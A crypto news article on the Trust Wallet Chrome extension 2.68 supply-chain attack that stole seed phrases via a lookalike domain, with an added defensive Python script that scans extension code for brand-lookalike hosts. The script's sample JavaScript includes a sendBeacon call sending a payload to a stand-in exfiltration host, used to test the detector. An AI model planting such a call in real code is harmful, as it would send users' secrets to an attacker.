Hundreds of Trust Wallet users have been hit by a devastating security breach that drained a total of $7 million in crypto assets due to a compromised browser extension update.
Key Takeaways
- Version 2.68 of the Trust Wallet Chrome extension was infected with malicious code that stole users’ seed phrases.
- The exploit resulted in losses of over $7 million, mostly in SOL, EVM tokens, and BTC.
- Trust Wallet urged users to upgrade to version 2.69 immediately to prevent further losses.
- Binance founder Changpeng Zhao confirmed all affected users will be fully compensated.
What Happened?
A supply chain attack on Trust Wallet’s browser extension version 2.68 allowed hackers to siphon millions in digital assets by tricking users into entering their seed phrases into a compromised interface. Once entered, funds were swiftly transferred to unknown wallets. The breach impacted hundreds of users and occurred during the holiday season, intensifying frustration and losses.
We’ve identified a security incident affecting Trust Wallet Browser Extension version 2.68 only. Users with Browser Extension 2.68 should disable and upgrade to 2.69.
Please refer to the official Chrome Webstore link here: https://t.co/V3vMq31TKb
Please note: Mobile-only users…
— Trust Wallet (@TrustWallet) December 25, 2025
A Coordinated Supply Chain Attack
The attack was first flagged by blockchain investigator ZachXBT, who identified a sudden wave of wallet drains. Cybersecurity researcher Akinator traced the source to malicious code hidden in the latest Chrome extension update. This code secretly redirected seed phrase data to a phishing domain, metrics-trustwallet․com, which has since been taken offline.
- The rogue version, 2.68, was released on December 24, 2025.
- Once a seed phrase was entered, funds were automatically stolen in minutes.
- Over 40% of stolen funds were in SOL, followed by 35% in EVM tokens and 25% in BTC.
Only users of the affected browser extension were impacted. Trust Wallet mobile apps remained secure.
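The exfiltration domain described above differs from a legitimate subdomain only by a hyphen where a dot would be, so it is a separate registrable domain that the vendor does not control. The following is an added example, not code from Trust Wallet or the researchers named here: a defender-side audit that lists the hosts referenced in an unpacked extension's JavaScript and flags brand lookalikes. The brand token, allowlist and sample script are constructed placeholders.

```python
import re
from pathlib import Path

# Assumptions for illustration: constructed brand token and allowlist.
BRAND = "examplewallet"
ALLOWED_DOMAINS = {"examplewallet.com", "googleapis.com"}

# Hostname part of any http(s)/ws(s) URL literal found in source text.
URL_HOST = re.compile(r"(?:https?|wss?)://([A-Za-z0-9.-]+)")

def registrable(host: str) -> str:
    """Naive eTLD+1 (last two labels); use a Public Suffix List library in production."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def classify(host: str) -> str:
    dom = registrable(host)
    if dom in ALLOWED_DOMAINS:
        return "allowed"
    # Brand name inside a domain the vendor does not own: treat as a lookalike.
    if BRAND in dom:
        return "lookalike"
    return "unlisted"

def audit_source(text: str) -> dict[str, str]:
    """Map every host referenced in the text to its verdict."""
    return {h.lower(): classify(h) for h in set(URL_HOST.findall(text))}

def audit_extension(root: str) -> dict[str, dict[str, str]]:
    """Scan all .js files under an unpacked extension; report non-allowed hosts per file."""
    report = {}
    for path in Path(root).rglob("*.js"):
        hosts = audit_source(path.read_text(errors="ignore"))
        findings = {h: v for h, v in hosts.items() if v != "allowed"}
        if findings:
            report[str(path)] = findings
    return report

# Constructed sample, not taken from the real extension.
SAMPLE_JS = '''
fetch("https://api.examplewallet.com/v1/prices");
const ws = new WebSocket("wss://rpc.examplewallet.com/ws");
navigator.sendBeacon("https://api.metrics-examplewallet.com/collect", payload);
fetch("https://cdn.thirdparty.example/lib.js");
'''

if __name__ == "__main__":
    for host, verdict in sorted(audit_source(SAMPLE_JS).items()):
        print(f"{verdict:10} {host}")
```

A static scan like this only sees hostnames written as literals; hosts assembled at runtime or hidden by obfuscation need a diff against the previous release or network monitoring to catch.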
Binance and Trust Wallet Respond
Trust Wallet developers quickly issued version 2.69 and advised all users to immediately disable the compromised version. A guide was published to help users update safely. Binance founder and Trust Wallet owner Changpeng Zhao (CZ) posted on X:
So far, $7m affected by this hack. @TrustWallet will cover. User funds are SAFU. Appreciate your understanding for any inconveniences caused. 🙏
The team is still investigating how hackers were able to submit a new version. https://t.co/xdPGwwDU8b
— CZ 🔶 BNB (@cz_binance) December 26, 2025
He also confirmed that all affected users will be fully reimbursed.
Meanwhile, analytics group Lookonchain tracked $4.2 million of the stolen funds already moving through crypto exchanges including ChangeNOW, FixedFloat, KuCoin, and HTX.
Larger Security Concerns in Crypto
This breach arrives in the wake of several crypto security issues:
- Earlier this month, Polymarket faced account breaches due to a third-party vulnerability.
- On Christmas Day, Binance saw a flash crash of BTC-USD1 to $24,000 due to issues with the USD1 stablecoin, tied to World Liberty Financial, which has links to the Trump family.
- Chainalysis reports that hackers have stolen over $3.4 billion in crypto so far in 2025.
Experts like Vladimir S. described the Trust Wallet incident as a supply chain attack, stressing the need for wallet developers to maintain tighter control over software updates.
CoinLaw’s Takeaway
Honestly, this kind of exploit makes me double down on my own crypto security habits. In my experience, browser extensions are a weak link in crypto custody. This breach is a wake-up call. I’ve always recommended using hardware wallets for storing significant amounts, and this only reinforces that. Trust Wallet’s fast response and CZ’s commitment to compensation are good signs, but it doesn’t undo the damage done to user trust. If you’re in crypto, never type your seed phrase unless you’re 100 percent sure the environment is secure.
